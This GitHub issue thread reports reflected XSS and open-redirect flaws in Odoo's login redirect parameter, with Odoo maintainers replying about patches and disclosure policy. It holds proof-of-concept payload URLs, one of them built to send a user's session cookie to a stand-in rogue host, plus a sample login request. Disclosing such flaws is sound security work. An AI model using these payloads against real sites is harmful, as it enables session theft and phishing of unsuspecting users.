### ISSUE TITLE
Reflected XSS and Unvalidated Redirects

### ISSUE THREAD

**Issue by adeptex** [odoo/odoo#13812]
**Impacted versions** all

Odoo login process is vulnerable to Reflected XSS and Unvalidated Redirect attacks via the _redirect_ GET parameter. It is possible to inject arbitrary JavaScript code in the login page URL in the way that upon successful login, the user will have the injected script executed in their browser.

The source of the problem can be seen here:
https://github.com/odoo/odoo/blob/fc2e80cb4bcc450762c7ac5cb82a3e2d88062b38/odoo/http.py#L167

The application will reflect whatever we put into the _redirect_ parameter.

**Unvalidated Redirect Payload**
https://asdf.odoo.com/web/login?db=asdf&redirect=http://www.google.com

The user will be taken to Google!

**Reflected XSS Payload**
https://asdf.odoo.com/web/login?db=asdf&redirect=http%3A%2f%2fwww.asdf.com%2fcookie%3D%27%2bdocument.cookie%2b%27%26hash%3D

The user will send their authenticated cookie to a rogue website. This attack is a perfect candidate for social engineering attacks to gain unauthorized access to the application.

**Expected behavior**
The application should restrict redirections to internal, known and trusted resources only. Additionally, it should correctly validate and encode user-provided data to prevent arbitrary code execution.

**Comment by JKE-be** [comment]
Hello, 

Can you confirm that you have apply the sec Adv 2016-07a #13179

Because it should be catched by this fix.

**Comment by adeptex** [comment]
Hi JKE-be,

So it took me forever and a day to get somebody to confirm that the latest patches are missing on that system. However, the unvalidated redirect vulnerability should still work even with the patches. 

PS> I didn't know about your responsible disclosure page. I will log the next bug there ;)

**Comment by JKE-be** [comment]
# What to report?

...

**But here are some example of vulnerabilities you should NOT report here:**
    
...
- Open redirectors, considered as vectors to attempt indirect phishing attacks - those attacks are also possible directly


From: https://www.odoo.com/page/responsible-disclosure

**Comment by adeptex** [comment]
Hi JKE-be,

Our systems dept did an update to the latest Version 8.0-20161117 and I can confirm that Open Redirect vulnerability still exists:

`POST /web/login HTTP/1.1
Host: odoo.domain.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

db=dbname&login=name@domain.com&password=secret&redirect=http://google.com`

This will redirect to Google after login. The redirect parameter can be specified in the GET request to the login page like so:

`https://odoo.domain.com/web/login?redirect=http://google.com`

**Comment by JKE-be** [comment]
Hello

Open redirect is not a security issue, and in this case we want this behaviour !

Thanks...
